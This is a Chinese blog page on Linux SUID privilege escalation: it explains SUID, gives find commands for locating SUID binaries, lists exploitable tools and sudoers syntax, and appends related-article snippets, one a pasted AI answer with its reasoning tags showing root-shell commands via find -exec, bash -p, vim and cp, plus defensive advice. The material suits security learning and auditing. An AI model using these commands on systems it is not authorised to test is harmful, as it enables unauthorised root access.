Linux-suid提权

最新推荐文章于 2025-04-11 22:30:54 发布
最新推荐文章于 2025-04-11 22:30:54 发布
阅读量1.6k 收藏 9
点赞数 2
分类专栏: 学习 文章标签: linux SUID提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/liver100day/article/details/117947252
版权

概论

SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,会使调用者暂时获得该文件拥有者的权限,如果拥有SUID权限,那么我们就
可以利用系统中的二进制文件和工具进行root提权。

查找具有 SUID 权限位文件

下面的命令可以发现所有系统中运行的SUID可执行文件。其实更加准确的说,这个命令将从/目录中查找具有SUID权限位且属主为root的文件,然后将所有错误重定向到/dev/null,从而达到仅列出该用户具有访问权限的二进制文件的功能。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

-perm 表示搜索的权限
-u=s 表示查找root用户拥有的文件
-type 表示我们正在寻找的文件类型
f 表示常规文件,不是目录或特殊文件
2 表示该进程的第二个文件描述符,既stderr(标准错误)
>表示重定向
> /dev/null 是一个特殊的文件系统对象,他将丢弃写入的所有内容

当然也可以使用 sudo -l 命令,列出当前用户可执行的命令
在这里插入图片描述

常用提权方式

1.nmap
2.find
3.vi/vim
4.bash
5.less
6.more
7.nano
8.cp
9.wget
10.apache
11.python
12.tcpdump
13. apache
14.man

1.1 /etc/sudoers 语法

root ALL=(ALL) ALL

root 用户可以从 ALL(任何)终端执行,充当ALL(任何)用户,并运行ALL(任何)命令。第一部分指定用户,第二部分指定可充当用户,第三部分指定 sudo 可运行的命令。

liver100day ALL= /sbin/poweroff

输入liver100day用户的密码,可以 sudo 执行

最低0.47元/天 解锁文章
操作系统升(十九)之Linux-SUID
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 2252
SUID是一种特殊限,设置suid的程序文件,在用户执行该程序时,用户的限是该程序文件属主的限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的限。sgid与suid类似,只是执行程序时获得的是文件属组的限。passwd这个命令程序的设置,它就是设置suid限的只有可以执行的二进制程序文件才能设定SUID限,非二进制文件设置SUID限没任何意义.命令执行者要对该程序文件拥有执行(x)限.命令执行者在执行该程序时获得该程序文件属主的身份.
Linux--SUID&内核漏洞本地用户
2401_84968693的博客
05-17 1081
目录SUID漏洞成因过程:手工命令探针:参考利用:脚本探针:LinEnum.shtraitorlinuxprivchecker等等…Linux命令的利用:find命令利用nc反弹利用python反弹–棱角内核漏洞本地用户过程:探针项目:命令执行: https://gtfobins.github.io/https://pentestlab.blog/2017/09/25/suid-executables/GitHub - rebootuser/LinEnum: Scripted Local L
suidlinux
weixin_68652890的博客
04-15 1101
suid suid(设置用户的id)是Linux中的一种特殊限,当运行具有suid限的二进制文件的时候,使得调用者暂时获得该文件拥有者的限(比如a文件拥有者是root,且被赋予了s限,当我们用另外一个普通用户调用a文件的时候,调用过程中这个普通用户会获得root限) 除了经常看见的rwx限还有s限 s限,设置使文件在执行阶段具有文件所有者的限,相当于临时拥有文件所有者的身份。 SUID 当执行的文件被赋予了s限,就被称为Set UID,简称为SUID的特殊限。简称为SUID的特殊
linux suid
qq_42307546的博客
04-15 719
SUID是赋予文件的一种限,它会出现在文件拥有者限的执行位上,具有这种限的文件会在其执行 时,使调用者暂时获得该文件拥有者的限。也就是如果ROOT用户给某个可执行文件加了S限,那么 该执行程序运行的时候将拥有ROOT限 以下命令可以发现系统上运行的所有SUID可执行文件 find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000-print2>/dev/null find / -user root -perm
LinuxSUID
最新发布
2201_75556043的博客
04-11 844
简单讲述了SUID过程以及部分演示
linux系统suid
focus on security
05-19 5805
SUID 0x01什么是SUIDSUID (Set UID)是Linux中的一种特殊限,其功能为用户运行某个程序时,如果该程序有SUID限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义. ​ 在执行过程中,调用者会暂时获得该文件的所有者限,且该限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果
Linux SUID
她叫常玉莹
08-28 1928
概述findNmaplessbashvim 概述 SUIDLinux的一种限机制,具有这种限的文件会在其执行时,使调用者暂时获得该文件拥有者的限,如果拥有SUID限,那么就可以利用系统中的二进制文件和工具进行root。 目前可以用来Linux可执行文件列表 nmap vim find bash more less nano cp 用于查找SUID命令可执行文件的命令 find / -perm -u=s -type f 2>/dev/null find / -user roo..
linux-SUID
qq_40510246的博客
07-15 1069
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID的思路就是运行root用户所拥有的SUID文件,那么我们运行该文件的时候就得获得root用户的身份了。 已知的可用来linux可行性的文件列表如下: Nmap Vim find Bash More Less Nano cp 以下命令可以发现系统上运行的所有SUID可执行文件。 find / -u...
Linux---内核Linux配置错误、定时任务
qq_40012781的博客
07-03 1843
Linux---内核Linux配置错误、定时任务
Linux:SUID
Elite的博客
03-05 2950
以find命令为例,讲解SUID原理
LinuxSUID
weixin_51692662的博客
08-22 2200
linuxsuid
Linuxsuid
2301_76227305的博客
04-02 1928
以上总结的是常见的suid,后续会持续跟新。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
linuxSUID以及文件限问题
黑锤的博客
11-25 1837
要讲到suid的话,首先应该就要非常清楚地知道linux文件限的相关问题。 在linux系统上有着非常严格的限控制,如果想对某个文件执行某种操作的话,必须具有对应的限方可执行成功。 linux下的文件限类型一般包括读、写、执行。对应的字母为r、w、x。 linux限有三种分组分别为拥有者、群组、其他组。每个文件都可以针对这三个组,设置不同的rwx(读写执行)限。 在Linux...
Linux
weixin_60567444的博客
05-14 1068
1.SUID限只能设置二进制文件2.命令执行者要有二进制的执行限3.命令执行者执行二进制文件时会获得该程序的属主身份4.SUID限只在程序执行的过程中有效即如果root给一个程序赋予了suid限,则普通用户在执行的过程中是root限可以通过find / -perm -u=s -type f 2>/dev/null 命令来查找带有SUID限的文件perm-指定的-u=s代表SUID限 type指定文件的类型 f-可以理解为可执行文件以cp为列子:在root下找到cp并且给它加SUID
Linux suid功能
weixin_34185560的博客
05-03 198
suid1.用户对应的前三位的x位上如果有s就表示,suid。当x位上没有x的时候,suid不是S。2.setuid位是让普通用户可以以root(或其他)用户的角色运行只有root(或其他)帐号才能运行的程序或命令,或程序命令对应本来没有限操作的文件等。(注意和su及sudo的区别)。3.仅对二进制命令或程序有效,不能用在shell等类似脚本文件上(因为shell脚本仅仅是...
网安学途—SUID教程
星虐
11-18 1929
本文介绍了SUID的基本概念、如何设置SUID限,以及常见的具有SUID限的二进制可执行文件(如nmap、vim、find、bash等)。此外,文章详细阐述了如何利用这些文件进行操作,包括使用find、nmap、more、less、bash、vim、awk和cp等命令的具体方法。最后,文章还对比了/bin/bash和/bin/sh的区别,指出Bash功能更强大,而/bin/sh可能是Bash或其他Shell的符号链接。
Linux 安全 - SUID机制
小立仔
09-28 3553
Linux 安全 - SUID机制简介
rocky linux使用suid
04-01
<think>好的,我现在需要帮助用户了解在Rocky Linux中如何利用SUID进行升。首先,我需要回顾一下SUID的基本概念,确保自己理解正确。SUID(Set User ID)是一种特殊限,当设置在一个可执行文件上时,无论谁运行该文件,它都会以文件所有者的限执行。例如,/usr/bin/passwd就有SUID设置,这样普通用户修改密码时能临时获得root限。 接下来,用户的具体问题是关于Rocky LinuxSUID教程。我应该先解释SUID的作用机制,再逐步指导如何查找具有SUID限的文件,然后分析这些文件是否可能被利用。常见的可利用的SUID程序包括bash、find、vim等,如果这些程序有SUID位,可能被用来限。 需要确保步骤清晰,用户能够一步步跟随操作。例如,使用find命令搜索SUID文件:find / -perm -4000 2>/dev/null。然后列举一些常见的可利用命令,并说明如何利用它们执行操作,比如使用find的exec参数执行命令,或者通过bash -p获取root shell。 同时,必须醒用户注意升的合法性,只能在授的环境中进行测试。此外,需要到防范措施,比如定期检查SUID文件,删除不必要的SUID限,使用最小限原则等。 在回答中,还需要引用供的参考资料。例如,引用[3]中到了SUID的作用和示例,引用[1]中的chmod命令设置SUID限,这些都可以用来支持解释。引用[4]中的例子展示了以root身份执行代码的情况,可以说明SUID的实际效果。 最后,生成相关问题,帮助用户进一步学习,比如如何检测系统中的SUID文件,或者SUID与SGID的区别等。要确保问题相关且有引导性,促进用户深入理解。 需要检查是否有技术错误,比如命令是否正确,步骤是否可行。例如,使用find命令时,参数是否正确,是否有处理错误输出的重定向。另外,到的示例是否适用于Rocky Linux,因为Rocky是基于RHEL的,可能与Ubuntu有些不同,但SUID机制是通用的,所以应该没问题。 总结回答的结构:先介绍SUID概念,然后步骤分解,包括查找文件、分析利用、示例演示,接着是防范措施,最后相关问题。确保每个部分逻辑清晰,语言简洁,符合用户要求的中文回答,并且正确使用LaTeX格式标注行内公式(如果有的话,但当前问题可能不需要数学公式,不过需检查是否有需要的地方)。</think>### Rocky Linux SUID原理与实现 SUID(Set User ID)是Linux系统中三种特殊限之一,当可执行文件设置SUID位后,执行该文件时会以文件所有者的身份运行[^3]。该特性常用于需要临时限的系统工具(如$passwd$命令),但也可能成为攻击者升的入口。 --- ### 一、SUID实施步骤 #### 1. 查找SUID文件 ```bash find / -perm -4000 2>/dev/null # 搜索所有SUID文件 ``` 关键结果示例: ```bash /usr/bin/bash /usr/bin/find /usr/bin/vim /usr/bin/cp ``` #### 2. 分析可利用程序 常见危险SUID程序: - **find**:可通过`-exec`参数执行命令 - **bash**:使用`bash -p`可保留特 - **vim**:通过`:!bash`启动shell - **cp**:覆盖敏感文件如/etc/passwd #### 3. 操作示例 **▌ 通过find** ```bash touch testfile find testfile -exec whoami \; # 显示当前执行身份 find testfile -exec /bin/bash -p \; # 获取root shell ``` **▌ 通过bash** ```bash bash -p # 启动特shell id # 验证uid=0(root) ``` **▌ 通过vim** ```bash vim /anyfile :!bash -p # 在vim中启动shell ``` --- ### 二、防御措施 1. **限审计**:定期执行`find / -perm -4000`检查 2. **最小化原则**:使用`chmod u-s filename`移除非必要SUID限[^1] 3. **命名空间隔离**:容器环境中限制root限传播[^4] 4. **系统更新**:及时修复类似CVE-2015-1328的本地漏洞[^2] ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值